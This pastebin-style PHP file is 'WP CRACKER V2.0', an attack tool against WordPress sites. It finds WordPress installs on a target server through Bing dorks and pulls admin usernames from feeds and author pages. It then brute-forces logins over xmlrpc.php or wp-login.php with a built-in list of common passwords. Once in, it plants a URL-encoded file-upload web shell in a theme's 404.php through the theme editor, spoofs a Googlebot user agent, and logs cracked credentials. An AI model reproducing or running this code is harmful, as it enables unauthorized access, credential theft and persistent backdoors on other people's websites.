SHOW:
|
|
- or go back to the newest paste.
1 | <html> | |
2 | <title>WP CRACKER V2.0</title> | |
3 | <style> | |
4 | body{background-color:#f1f1f1;} | |
5 | input,select,textarea{ | |
6 | border:1px solid #4F4F4F; font-family:Verdana; font-size:11px; | |
7 | } | |
8 | </style> | |
9 | <center> | |
10 | <table cellpadding='5'> | |
11 | <tr><td align=center><h2>WP CRACKER V2.0</h2></td></tr> | |
12 | <?php | |
13 | #WP CRACKER V2.0 | |
14 | #INJ3CTOR_M4 | |
15 | @set_time_limit(0); | |
16 | error_reporting(0); | |
17 | ||
18 | if(!isset($_POST['brute'])){ | |
19 | echo'<tr><td align="center">'; | |
20 | echo'<b>Server iP:</b>'; | |
21 | echo'<form method="POST">'; | |
22 | echo'<input size="60" type="text" name="ip" placeholder="Put Target Server iP">'; | |
23 | echo'<input type="submit" value="Grab_WP!"></td></tr></table>'; | |
24 | echo'<table cellpadding="5">'; | |
25 | echo'<tr><td align="center"><b>Web-Sites List</b></td><td align="center"><b>Passwords</b></td></tr>'; | |
26 | if(!isset($_POST['ip'])){ | |
27 | echo'<tr><td align="center"><textarea name="sites" cols="32" rows="23" placeholder="http://localhost/"></textarea></td>'; | |
28 | }else{ | |
29 | $ip = trim($_POST['ip']); | |
30 | $dorks = array('/?page_id=', '/?p='); | |
31 | foreach($dorks as $dork){ | |
32 | $query = "ip:$ip $dork"; | |
33 | $allLinks = bingServerCrawler($query); | |
34 | foreach($allLinks as $link){ | |
35 | if(eregi("page_id=|p=", $link)){ $link = pathinfo($link)['dirname']; | |
36 | $data = get_source($link . "/wp-includes/wlwmanifest.xml"); | |
37 | if(preg_match('#<clientType>WordPress</clientType>#i', $data)){ | |
38 | $wpLinks[] = $link; | |
39 | } | |
40 | } | |
41 | } | |
42 | } | |
43 | if(!empty($wpLinks)){ $wpLinks = array_unique($wpLinks); | |
44 | echo'<tr><td align="center"><textarea name="sites" cols="32" rows="23">'; | |
45 | foreach($wpLinks as $wordpress){ | |
46 | echo $wordpress ."\r\n"; | |
47 | } | |
48 | echo'</textarea></td>'; | |
49 | } | |
50 | } | |
51 | echo'<td><textarea name="passwords" cols="32" rows="23">'; | |
52 | echo' | |
53 | 00000 | |
54 | 000000 | |
55 | 0000000 | |
56 | 00000000 | |
57 | 0123456789 | |
58 | 102030 | |
59 | 111111 | |
60 | 112233 | |
61 | 123 | |
62 | 123123 | |
63 | 12345 | |
64 | 123456 | |
65 | 1234567 | |
66 | 12345678 | |
67 | 123456789 | |
68 | 321321 | |
69 | 654321 | |
70 | admin | |
71 | adminadmin | |
72 | admin123 | |
73 | admin123123 | |
74 | admin1234 | |
75 | admin123456 | |
76 | administrator | |
77 | abc123 | |
78 | demo | |
79 | qwerty | |
80 | qwerty123 | |
81 | passwd | |
82 | password | |
83 | p@ssw0rd | |
84 | passw0rd | |
85 | passwords | |
86 | pass123 | |
87 | pass121 | |
88 | pass | |
89 | pass1234 | |
90 | test | |
91 | test123 | |
92 | root | |
93 | toor | |
94 | user | |
95 | welcome1 | |
96 | welcome | |
97 | '; | |
98 | echo'</textarea></td></tr></table>'; | |
99 | echo'<table cellpadding="5">'; | |
100 | echo'<tr><td align="center"><input type="submit" name="brute" value="Start BruteForce!"/></form></td></tr></table>'; | |
101 | }else{ | |
102 | $sites = array_unique(array_map("trim", explode("\r\n", $_POST['sites']))); | |
103 | $passwords = array_unique(array_map("trim", explode("\r\n", $_POST['passwords']))); | |
104 | $f = fopen('rezult.html', 'a+'); | |
105 | echo'<table border="1" cellpadding="5">'; | |
106 | foreach($sites as $site){ | |
107 | $site = rtrim($site, '/'); | |
108 | vbflush(); # buffer clean | |
109 | echo"<tr><td><b>Target --> $site</b></td></tr>"; | |
110 | fwrite($f, "<br />target --> <b>$site</b><br />"); | |
111 | $user = admin_wp($site); | |
112 | echo"<tr><td>Username is: <b>$user</b></td>"; | |
113 | fwrite($f, "Username: <b>$user</b><br />"); | |
114 | foreach($passwords as $pass){ | |
115 | if(WP_CRACKER($site, $user,$pass) == true){ | |
116 | vbflush(); # buffer clean | |
117 | echo"<tr><td><b><font color='green'>Password is: $pass</font></b></td></tr>"; | |
118 | fwrite($f, "Password: <b>$pass</b><br />"); | |
119 | if(uploadshell($site) == true){ | |
120 | echo"<tr><td><b><font color='green'>Shell Uploaded: $site/wp-content/themes/twentythirteen/404.php</font></b></td></tr>"; | |
121 | fwrite($f, "Shell: <b>$site/wp-content/themes/twentythirteen/404.php</b><br />"); | |
122 | }else{ | |
123 | echo'<tr><td><font color="red">Can\'t Upload Shell!</font></td></tr>'; | |
124 | } | |
125 | break; | |
126 | }else{ | |
127 | vbflush(); # buffer clean | |
128 | echo"<tr><td><font color='red'>$pass NO!</font></td></tr>"; | |
129 | } | |
130 | } | |
131 | } | |
132 | fclose($f); | |
133 | } | |
134 | echo'</table>'; | |
135 | ||
136 | // Functions // | |
137 | ||
138 | function bingServerCrawler($dork){ | |
139 | $ch = curl_init(); | |
140 | $i = 1; | |
141 | while($i){ | |
142 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
143 | curl_setopt($ch, CURLOPT_URL, "http://www.bing.com/search?q=" . urlencode($dork) . "&first={$i}"); | |
144 | curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); | |
145 | curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); | |
146 | curl_setopt($ch, CURLOPT_USERAGENT, "SamsungI8910/SymbianOS/9.1 Series60/3.0"); | |
147 | curl_setopt($ch, CURLOPT_ENCODING, "gzip, deflate, compress"); | |
148 | $data = curl_exec($ch); | |
149 | preg_match_all('#<h2 class="sb_h3 cttl"><a href="(.*?)"#i', $data, $matches); | |
150 | foreach($matches[1] as $link){ | |
151 | $allLinks[] = $link; | |
152 | } | |
153 | if(!preg_match('#class="sb_pagN"#i', $data)) break; | |
154 | $i+=10; | |
155 | } | |
156 | curl_close($ch); | |
157 | if(!empty($allLinks) && is_array($allLinks)){ | |
158 | return array_unique($allLinks); | |
159 | } | |
160 | } | |
161 | ||
162 | function get_source($link, $safemode = false, $agent){ | |
163 | if($safemode === true) sleep(1); | |
164 | if(!$agent){ $agent='Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'; } | |
165 | if(!function_exists('curl_init')){ | |
166 | return file_get_contents($link); | |
167 | }else{ | |
168 | $ch = curl_init(); | |
169 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
170 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); | |
171 | curl_setopt($ch, CURLOPT_URL, $link); | |
172 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); | |
173 | curl_setopt($ch, CURLOPT_USERAGENT, $agent); | |
174 | curl_setopt($ch, CURLOPT_ENCODING, 0); | |
175 | curl_setopt($ch, CURLOPT_TIMEOUT, 30); | |
176 | $data = curl_exec($ch); | |
177 | curl_close($ch); | |
178 | ||
179 | return $data; | |
180 | } | |
181 | } | |
182 | ||
183 | function admin_wp($wp){ | |
184 | $data = get_source($wp . "/?feed=atom"); | |
185 | if(preg_match('#<name>(.*?)</name>#', $data, $user)){ | |
186 | if(strlen($user[1]) > 0 && strlen($user[1]) <= 15){ | |
187 | return $user[1]; | |
188 | } | |
189 | }else{ | |
190 | $data = get_source($wp . "/?author=1"); | |
191 | if(preg_match('#<body class="archive author author-(.*?) author-(.*?)(.*)">#i', $data, $user)){ | |
192 | return $user[1]; | |
193 | }else{ | |
194 | return "admin"; | |
195 | } | |
196 | } | |
197 | } | |
198 | ||
199 | function WP_CRACKER($site, $user, $pass){ | |
200 | $xmlprc = get_source($site .'/xmlrpc.php'); | |
201 | $ch = curl_init(); | |
202 | if(preg_match('#server accepts POST#i', $xmlprc)){ | |
203 | curl_setopt($ch, CURLOPT_URL, $site ."/xmlrpc.php"); | |
204 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); | |
205 | curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)"); | |
206 | curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded')); | |
207 | curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); | |
208 | curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); | |
209 | curl_setopt($ch, CURLOPT_POST, 1); | |
210 | curl_setopt($ch, CURLOPT_POSTFIELDS, "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>$user</string></value></param><param><value><string>$pass</string></value></param></params></methodCall>"); | |
211 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
212 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); | |
213 | $data = curl_exec($ch); | |
214 | return (preg_match('#<name>isAdmin</name>#i', $data)) ? true:false; | |
215 | }else{ | |
216 | curl_setopt($ch, CURLOPT_URL, $site .'/wp-login.php'); | |
217 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); | |
218 | curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)"); | |
219 | curl_setopt($ch, CURLOPT_COOKIE, "wordpress_test_cookie=WP+Cookie+check"); | |
220 | curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); | |
221 | curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); | |
222 | curl_setopt($ch, CURLOPT_POST, 1); | |
223 | curl_setopt($ch, CURLOPT_POSTFIELDS, "log={$user}&pwd={$pass}&wp-submit=Log+In&redirect_to={$site}/wp-admin/&testcookie=1"); | |
224 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
225 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); | |
226 | $data = curl_exec($ch); | |
227 | return (preg_match('/logout/', $data)) ? true:false; | |
228 | } | |
229 | } | |
230 | ||
231 | function uploadshell($site){ | |
232 | $ch = curl_init(); | |
233 | curl_setopt($ch, CURLOPT_URL, $site .'/wp-admin/theme-editor.php?file=404.php&theme=twentythirteen'); | |
234 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); | |
235 | curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)"); | |
236 | curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); | |
237 | curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); | |
238 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
239 | $data = curl_exec($ch); | |
240 | curl_close($ch); | |
241 | if(preg_match('#name="_wpnonce" value="(.*?)"#', $data, $token)){ | |
242 | $post = "_wpnonce={$token[1]}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Ftheme-editor.php%3Ffile%3D404.php%26theme%3Dtwentythirteen%26scrollto%3D0%26updated%3Dtrue&newcontent=%3C%3Fphp%0Aecho%20%27Uploader%20By%20INJ3CTOR_M4%27%3B%0Aecho%27%0A%3Cform%20method%3D%22post%22%20enctype%3D%22multipart%2fform-data%22%3E%0A%3Cinput%20name%3D%22file%22%20type%3D%22file%22%20%2f%3E%0A%3Cinput%20name%3D%22path%22%20type%3D%22text%22%20value%3D%22%27.getcwd%28%29.%27%22%20%2f%3E%0A%3Cinput%20type%3D%22submit%22%20value%3D%22Up%22%20%2f%3E%0A%3C%2fform%3E%0A%27%3B%0Aif%28isset%28%24_FILES%5B%27file%27%5D%29%20%26%26%20isset%28%24_POST%5B%27path%27%5D%29%29%7B%0A%20%20%20%20if%28move_uploaded_file%28%24_FILES%5B%27file%27%5D%5B%27tmp_name%27%5D%2C%24_POST%5B%27path%27%5D.%27%2f%27.%24_FILES%5B%27file%27%5D%5B%27name%27%5D%29%29%7B%0A%20%20%20%20%20%20%20%20echo%20%27%3Cfont%20color%3D%22green%22%3EFile%20Upload%20Done.%3C%2ffont%3E%3Cbr%20%2f%3E%27%3B%0A%20%20%20%20%7Delse%7B%0A%20%20%20%20%20%20%20%20echo%20%27%3Cfont%20color%3D%22red%22%3EFile%20Upload%20Error.%3C%2ffont%3E%3Cbr%20%2f%3E%27%3B%0A%20%20%20%20%7D%0A%7D%0A%3F%3E&action=update&file=404.php&theme=twentythirteen&scrollto=0&docs-list=&submit=Update+File"; | |
243 | $ch = curl_init(); | |
244 | curl_setopt($ch, CURLOPT_URL, $site .'/wp-admin/theme-editor.php'); | |
245 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); | |
246 | curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)"); | |
247 | curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); | |
248 | curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); | |
249 | curl_setopt($ch, CURLOPT_POST, 1); | |
250 | curl_setopt($ch, CURLOPT_POSTFIELDS, $post); | |
251 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
252 | $data = curl_exec($ch); | |
253 | curl_close($ch); | |
254 | $data = get_source($site .'/wp-content/themes/twentythirteen/404.php'); | |
255 | return (preg_match('/Uploader By INJ3CTOR_M4/', $data)) ? true:false; | |
256 | }else{ return FALSE; } | |
257 | } | |
258 | ||
259 | function vbflush(){ | |
260 | static $gzip_handler = null; | |
261 | if($gzip_handler === null){ | |
262 | $gzip_handler = false; | |
263 | $output_handlers = ob_list_handlers(); | |
264 | if(is_array($output_handlers)){ | |
265 | foreach($output_handlers as $handler){ | |
266 | if($handler == 'ob_gzhandler'){ | |
267 | $gzip_handler = true; | |
268 | break; | |
269 | } | |
270 | } | |
271 | } | |
272 | } | |
273 | if($gzip_handler){ | |
274 | // forcing a flush with this is very bad | |
275 | return; | |
276 | } | |
277 | if(ob_get_length() !== false){ | |
278 | @ob_flush(); | |
279 | } | |
280 | flush(); | |
281 | } |